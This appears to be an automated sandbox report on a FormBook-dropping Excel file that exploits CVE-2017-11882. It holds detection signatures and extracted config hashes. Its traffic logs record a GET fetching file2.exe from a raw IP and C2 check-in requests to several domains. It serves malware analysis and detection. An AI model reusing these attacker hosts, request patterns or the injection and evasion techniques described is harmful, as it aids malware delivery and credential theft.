Analysis Report NEW 01 13 2021.xlsx

Overview

General Information

Sample Name: NEW 01 13 2021.xlsx
Analysis ID: 339199
MD5: 9aa0898ded04a2ee18d7b0074413ac94
SHA1: 59c525a0dd116c9f7ec4b5773a7131ef49a29ad9
SHA256: d6823f8eaf8a072000df7cc5811f35e58f63182657c67f7d99874d7f534851e8
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 6.2.vbc.exe.400000.0.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79d9", "KEY1_OFFSET 0x1bae5", "CONFIG SIZE : 0xaf", "CONFIG OFFSET 0x1bbe5", "URL SIZE : 21", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x175102a1", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012168", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd015c9", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
Multi AV Scanner detection for submitted file
Source: NEW 01 13 2021.xlsx Virustotal: Detection: 29% Perma Link
Source: NEW 01 13 2021.xlsx ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: chkdsk.pdb source: vbc.exe, 00000006.00000002.2220300365.000000000047D000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, chkdsk.exe

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.yjpps.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 18.195.87.136:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 18.195.87.136:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 54.254.26.94:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 16:17:28 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 13 Jan 2021 09:32:43 GMTETag: "ce400-5b8c4d239f0b9"Accept-Ranges: bytesContent-Length: 844800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 63 bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 da 0c 00 00 08 00 00 00 00 00 00 ce f8 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 f8 0c 00 4b 00 00 00 00 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 d8 0c 00 00 20 00 00 00 da 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0d 00 00 06 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 e2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f8 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 3e 0b 00 88 b9 01 00 03 00 00 00 43 01 00 06 68 36 02 00 90 08 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 2b 02 26 16 02 28 01 00 00 0a 2a 36 2b 02 26 16 00 02 28 04 00 00 0a 00 2a 00 00 13 30 03 00 12 01 00 00 01 00 00 11 fe 09 00 00 fe 0e 00 00 fe 0c 00 00 20 2b f3 88 0a 20 96 b2 41 ee 58 20 2a a0 25 08 59 20 87 05 a5 f0 61 20 02 00 00 00 63 3b 68 00 00 00 fe 0c 00 00 20 e1 68 eb e3 20 e9 68 eb e3 61 59 45 04 00 00 00 5f 00 00 00 2a 00 00 00 a1 00 00 00 52 00 00 00 fe 0c 00 00 20 fe 73 c8 26 65 20 66 8c 37 d9 59 20 02 00 00 00 63 66 59 45 02 00 00 00 64 00 00 00 4c 00 00 00 38 77 00 00 00 20 44 78 c5 1e 65 20 23 a7 e4 e1 61 20 5d df 21 ff 58 20 01 00 00 00 63 2a 20 2b 0e 54 1b 65 66 65 20 db f1 ab e4 59 2a 20 0b 00 00 00 66 20 01 00 00 00 63 2a 20 c7 ef eb 2e 20 ce c8 4e 09 59 20 06 d9 62 da 58 2a 20 03 49 7e 12 20 2a 68 99 eb 61 20 e1 4d dc dc 58 20 f2 90 3c 29 61 2a 20 18 75 52 ea 20 65 ff c1 fc 59 20 3e 39 9f 0f 61 20 9c 4c 0f e2 59 2a 20 19 b6 66 1f 20 98 fb 6f 12 59 20
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 35.246.6.109 35.246.6.109
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: unknown TCP traffic detected without corresponding DNS query: 18.195.87.136
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31FF70E4.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /ttkkz/file2.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=7KG5rMnMQSi+1zMSyyvwq06b8xrmRTVdiDQe9ch18oMrwrVTJ7b27nrbU/HrWldfz0eoHA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.gdsjgf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=RsrdfQA8mV6w+G/ZSF//8cbwzrXLIF3fF+wu7E1CRyzxZyo6WmOBkrcqEvWwnRlrF5Tahg== HTTP/1.1Host: www.thepoetrictedstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.tuvandadayvitos24h.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf- HTTP/1.1Host: www.acdfr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1Host: www.h2oturkiye.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.yjpps.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 16:19:08 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.acdfr.comVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Wed, 27-Jan-2021 16:19:08 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages20.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 31 30 34 37 39 38 34 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
